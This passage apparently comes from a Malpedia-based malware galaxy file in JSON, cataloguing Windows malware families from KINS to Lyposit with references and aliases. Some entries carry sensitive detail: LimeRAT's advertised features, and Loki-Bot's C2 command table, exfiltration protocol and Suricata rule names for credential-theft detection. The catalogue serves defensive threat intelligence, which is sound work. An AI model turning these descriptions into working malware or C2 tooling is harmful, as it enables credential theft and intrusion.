"https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://www.youtube.com/watch?v=C-dEOt0GzSE", "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", "https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html", "https://github.com/nyx0/KINS" ], "synonyms": [ "Kasper Internet Non-Security", "Maple" ], "type": [] }, "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", "value": "KINS" }, { "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ "Joglog" ], "type": [] }, "uuid": "618b6f23-fc83-4aff-8b0a-7f7138be625c", "value": "KleptoParasite Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html" ], "synonyms": [], "type": [] }, "uuid": "70459959-5a20-482e-b714-2733f5ff310e", "value": "KLRD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://github.com/zerosum0x0/koadic" ], "synonyms": [], "type": [] }, "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", "value": "Koadic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", "https://twitter.com/struppigel/status/812726545173401600" ], "synonyms": [], "type": [] }, "uuid": "f7674d06-450a-4150-9180-afef94cce53c", "value": "KokoKrypt" }, { "description": "KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99", "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" ], "synonyms": [], "type": [] }, "uuid": "116f4c5f-fd51-4e90-995b-f16c46523c06", "value": "KOMPROGO" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant", "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html" ], "synonyms": [], "type": [] }, "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", "value": "Konni" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" ], "synonyms": [], "type": [] }, "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", "value": "KoobFace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", "https://securitykitten.github.io/2014/11/25/curious-korlia.html", "https://camal.coseinc.com/publish/2013Bisonal.pdf", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit", "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf" ], "synonyms": [ "Bisonal" ], "type": [] }, "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", "value": "Korlia" }, { "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless" ], "synonyms": [], "type": [] }, "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", "value": "Kovter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" ], "synonyms": [], "type": [] }, "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", "value": "KPOT Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken", "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/", "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/", "https://www.recordedfuture.com/kraken-cryptor-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "3d7ae6b9-8161-470e-a7b6-752151b21657", "value": "Kraken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/" ], "synonyms": [ "BlackMoon" ], "type": [] }, "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", "value": "KrBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" ], "synonyms": [], "type": [] }, "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", "value": "KrDownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" ], "synonyms": [ "Osiris" ], "type": [] }, "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", "value": "Kronos" }, { "description": "A keylogger used by Turla.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t", "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/" ], "synonyms": [], "type": [] }, "uuid": "aa93d030-abef-4215-bc9e-6c7483562d19", "value": "KSL0T" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" ], "synonyms": [ "Barys", "Gofot", "Kuaibpy" ], "type": [] }, "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", "value": "Kuaibu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" ], "synonyms": [], "type": [] }, "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", "value": "Kuluoz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", "value": "Kurton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki", "https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/" ], "synonyms": [], "type": [] }, "uuid": "ff40299b-dc45-4a1c-bfe2-3864682b8fea", "value": "Kutaki" }, { "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/" ], "synonyms": [], "type": [] }, "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", "value": "Kwampirs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", "http://adelmas.com/blog/longhorn.php", "https://www.youtube.com/watch?v=jeLd-gw2bWo", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", "value": "Lambert" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" ], "synonyms": [], "type": [] }, "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", "value": "Lamdelin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access", "http://malware-traffic-analysis.net/2017/04/25/index.html", "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/" ], "synonyms": [], "type": [] }, "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", "value": "LatentBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", "https://twitter.com/PhysicalDrive0/status/828915536268492800", "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html" ], "synonyms": [], "type": [] }, "uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0", "value": "Lazarus (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" ], "synonyms": [], "type": [] }, "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", "value": "Laziok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat", "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" ], "synonyms": [], "type": [] }, "uuid": "454db469-724a-4084-873c-906abf91d0d5", "value": "LazyCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "synonyms": [], "type": [] }, "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", "value": "Leash" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html" ], "synonyms": [ "shoco" ], "type": [] }, "uuid": "41da41aa-0729-428a-8b82-636600f8e230", "value": "Leouncia" }, { "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", "http://www.malware-traffic-analysis.net/2017/11/02/index.html", "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/" ], "synonyms": [], "type": [] }, "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, { "description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", "https://www.youtube.com/watch?v=x-g-ZLeX8GM", "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", "https://github.com/NYAN-x-CAT/Lime-RAT/" ], "synonyms": [], "type": [] }, "uuid": "771dbe6a-3f01-4bd4-8edd-070b2eb9df66", "value": "LimeRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" ], "synonyms": [], "type": [] }, "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", "value": "Limitail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", "value": "Listrix" }, { "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", "https://github.com/zettabithf/LiteHTTP", "https://malware.news/t/recent-litehttp-activities-and-iocs/21053" ], "synonyms": [], "type": [] }, "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", "value": "LiteHTTP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga", "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", "https://www.abuse.io/lockergoga.txt", "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880", "https://www.youtube.com/watch?v=o6eEN0mUakM", "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/" ], "synonyms": [], "type": [] }, "uuid": "a4a6469d-6753-4195-9635-f11d458525f9", "value": "LockerGoga" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", "value": "Locky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" ], "synonyms": [], "type": [] }, "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", "value": "Locky (Decryptor)" }, { "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" ], "synonyms": [], "type": [] }, "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", "value": "Locky Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" ], "synonyms": [], "type": [] }, "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", "value": "LockPOS" }, { "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" ], "synonyms": [ "Nymeria" ], "type": [] }, "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", "value": "Loda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", "value": "Logedrut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" ], "synonyms": [], "type": [] }, "uuid": "2789b246-d762-4d38-8cc8-302293e314da", "value": "LogPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax", "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" ], "synonyms": [], "type": [] }, "uuid": "15228ae0-26f9-44d8-8d6e-87b0bd2d2aba", "value": "LoJax" }, { "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", "https://isc.sans.edu/diary/24372", "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", "http://blog.fernandodominguez.me/lokis-antis-analysis/", "https://phishme.com/loki-bot-malware/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" ], "synonyms": [ "Loki", "LokiBot", "LokiPWS" ], "type": [] }, "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", "value": "Loki Password Stealer (PWS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", "https://twitter.com/hexlax/status/1058356670835908610" ], "synonyms": [], "type": [] }, "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", "value": "Lordix" }, { "description": "LOWBALL, uses the legitimate Dropbox cloud-storage\r\nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball", "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" ], "synonyms": [], "type": [] }, "uuid": "484b9fd9-76c6-41af-a85b-189b0fc94909", "value": "LOWBALL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", "value": "Luminosity RAT" }, { "description": " An uploader that can exfiltrate files to Dropbox.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney", "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "https://twitter.com/MrDanPerez/status/1097881406661902337" ], "synonyms": [], "type": [] }, "uuid": "fb0167e5-3457-46ec-a6d1-b8e4ad9bc89b", "value": "LunchMoney" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" ], "synonyms": [], "type": [] }, "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", "value": "Lurk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" ], "synonyms": [], "type": [] }, "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", "value": "Luzo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" ], 